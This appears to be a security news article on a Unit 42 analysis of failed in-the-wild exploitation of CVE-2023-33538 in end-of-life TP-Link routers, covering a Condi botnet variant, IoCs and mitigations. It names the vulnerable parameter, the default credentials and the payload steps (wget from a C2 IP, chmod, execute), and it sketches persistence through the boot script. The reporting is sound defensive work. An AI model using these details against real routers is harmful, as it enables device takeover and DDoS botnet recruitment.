Attackers are actively scanning for CVE-2023-33538 on legacy TP-Link Wi-Fi routers and deploying Mirai-variant malware via automated probes. Yet, Unit 42 researchers found that in-the-wild exploit attempts contain critical errors that cause them to fail, even as the underlying vulnerability remains fully exploitable.
Palo Alto Networks’ Unit 42 threat intelligence team has released an in-depth technical analysis revealing active, large-scale exploitation attempts targeting CVE-2023-33538, a high-severity command injection vulnerability affecting several end-of-life TP-Link router models.
The vulnerability, carrying a CVSS score of 8.8, was first publicly disclosed in June 2023 and was officially added to the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) Catalog in June 2025.
Despite the flaws in the observed attack code, researchers confirm the vulnerability is real and poses a serious risk to millions of unpatched IoT devices still running default credentials.
Affected Devices and the Vulnerability
CVE-2023-33538 affects the following end-of-life TP-Link router models with no available vendor patches:
- TL-WR940N v2 and v4
- TL-WR740N v1 and v2
- TL-WR841N v8 and v10
The flaw resides in the /userRpm/WlanNetworkRpm web management endpoint. Specifically, the router’s httpd binary fails to sanitize the ssid1 parameter before passing it to a shell command iwconfig %s essid %s executed via execve("/bin/sh").
This allows an authenticated attacker to inject arbitrary operating system commands through a crafted HTTP GET request to the router’s web interface, potentially achieving full device compromise.
Unit 42’s telemetry detected mass exploitation attempts around the time of the CISA KEV listing, using HTTP GET requests with Basic Authentication encoded in Base64 (admin:admin → YWRtaW46YWRtaW4=).
The observed payloads attempted to: download an ARM ELF binary named arm7 from IP 51.38.137[.]113 using wget, grant it full permissions via chmod 777, and execute it with the parameter tplink.
However, the attack code contained a critical error: threat actors were targeting the ssid parameter instead of the correct vulnerable parameter ssid1.
This single mistake would cause all observed exploitation attempts to fail. Furthermore, the firmware’s limited BusyBox environment does not include common utilities like wget, curl, or vim meaning even a correctly targeted attack would struggle to download and execute the payload as intended.
Unit 42 confirmed these findings through full firmware emulation of the TP-Link TL-WR940N V4 using the open-source firmware-analysis-toolkit, reverse engineering the httpd binary to trace the complete execution path from the HTTP request through HTTP_Handler() → wlanNetworkSave() → parseWlanParams() → wirelessConfigUpdate() → executeFormatCmd() → execve("/bin/sh").
The Condi Botnet Connection
The arm7 binary recovered from the campaign is identified as a Condi IoT botnet variant, a Mirai-like malware family previously linked to DDoS campaigns.
The binary communicates with a command-and-control (C2) server at 51.38.137[.]113, which is also associated with the malicious domain cnc.vietdediserver[.]shop.
Once deployed, the infected device acts as a web server on a randomly assigned TCP port (1024–65535), serving fresh malware binaries targeting eight different CPU architectures, including MIPS, ARM, ARM6, ARM7, SH4, and x86_64.
The botnet uses a structured command protocol. Key command sequences include:
0x99 0x66 0x33– Heartbeat response to C20x33 0x66 0x99– HTTP server status check0x33 0x66 0x66– HTTP server starts on a random port0x66 0x66 0x99– Lockdown/termination preparation flag
Authentication Is the Critical Barrier
A key finding from Unit 42’s firmware emulation is that CVE-2023-33538 requires prior authentication to the router’s web management panel, a detail absent from the original vulnerability report.
The web panel’s login mechanism generates a session token via a PCSubWin() JavaScript function, which creates an authorization cookie by combining the username with the MD5 hash of the password and encoding the result in Base64. The session token is sufficiently random to prevent brute-forcing, meaning attackers must possess valid credentials.
This is where the default credential problem becomes the true threat vector. The default web panel credentials admin:admin are well-known and widely used across millions of deployed TP-Link routers.
An attacker using these credentials can gain authenticated access, inject commands into ssid1, trigger a reboot for denial-of-service, or overwrite the /etc/rc.d/rcS boot script to achieve persistent code execution across reboots.
Mitigation and Recommended Actions
TP-Link has confirmed that no patches will be issued for the affected end-of-life devices and recommends immediate hardware replacement. Organizations and home users still operating these models should take the following steps:
- Replace immediately with supported, actively patched hardware
- Change default credentials, never use
admin:adminon any network device - Disable remote web management access from untrusted networks
- Monitor for anomalous traffic to/from known C2 IPs:
51.38.137[.]113,bot.ddosvps[.]cc - Block known malicious domains:
cnc.vietdediserver[.]shop
Palo Alto Networks customers are protected through Advanced Threat Prevention, Advanced URL Filtering, Advanced DNS Security, Advanced WildFire, and Cortex Xpanse, which provides full visibility of exposed TP-Link routers across customer networks.
The Device Security platform can identify specific devices vulnerable to CVE-2023-33538 and alert on anomalous behavioral patterns.
Indicators of Compromise (IoCs)
| Type | Value |
|---|---|
| Malicious binary (arm7) | 7bbb21fec19512d932b7a92652ed0c8f0fedea89f34b9d6f267cf39de0eb9b20 |
| Malicious binary (arm) | 3fbd2a2e82ceb5e91eadbad02cb45ac618324da9b1895d81ebe7de765dca30e7 |
| Malicious binary (mips) | 534b654531a6a540a144da9545ee343e1046f843d7de4c1091b46c3ee66a508b |
| C2 Server IP | 51.38.137[.]113 |
| C2 Domain | cnc.vietdediserver[.]shop |
| Malware host | bot.ddosvps[.]cc |
This campaign illustrates a pattern increasingly observed across the IoT threat landscape: mass automated scanning with imprecise exploit code.
While the specific attacks seen in the wild would fail due to incorrect parameter targeting and the absence of wget it in the firmware, the underlying vulnerability is fully functional under real-world conditions where attackers use correct parameters and authenticated access.
The persistence of default credentials across billions of deployed IoT devices means that even “limited” vulnerabilities like CVE-2023-33538, which require authentication, remain practical, high-value attack vectors for botnet operators.
The CVE-2023-33538 campaign also overlaps with a broader pattern of TP-Link devices being actively targeted. Forescout researchers separately disclosed two new TP-Link vulnerabilities, CVE-2025-7850 and CVE-2025-7851, in late 2025, involving OS command injection via WireGuard VPN settings and unauthorized root access through residual debug code.
This trajectory signals that legacy and current-generation TP-Link hardware will remain high-priority targets for botnet operators and state-sponsored threat actors alike.
FAQ
Q1: What is CVE-2023-33538?
A high-severity (CVSS 8.8) command injection vulnerability in end-of-life TP-Link routers (TL-WR940N, TL-WR740N, TL-WR841N) that allows authenticated attackers to execute arbitrary OS commands via the unsanitized ssid1 parameter in the web management interface.
Q2: Are the active exploit attempts against CVE-2023-33538 successful?
No, observed attacks use the wrong parameter (ssid instead of ssid1) and rely on wget, which is absent in the firmware’s limited BusyBox environment, making all current in-the-wild attempts fail despite the real underlying vulnerability.
Q3: Is there a patch available for CVE-2023-33538?
No, TP-Link has confirmed that all affected models are end-of-life and no security patches will be released; users must replace these devices with supported hardware immediately.
Q4: What malware is being deployed through CVE-2023-33538 exploitation attempts?
Attackers are attempting to deploy a Condi IoT botnet variant (Mirai-like), specifically the arm7 ELF binary, which establishes C2 communications with 51.38.137[.]113 and recruits infected routers into a DDoS-capable botnet serving multi-architecture payloads.
About the Author
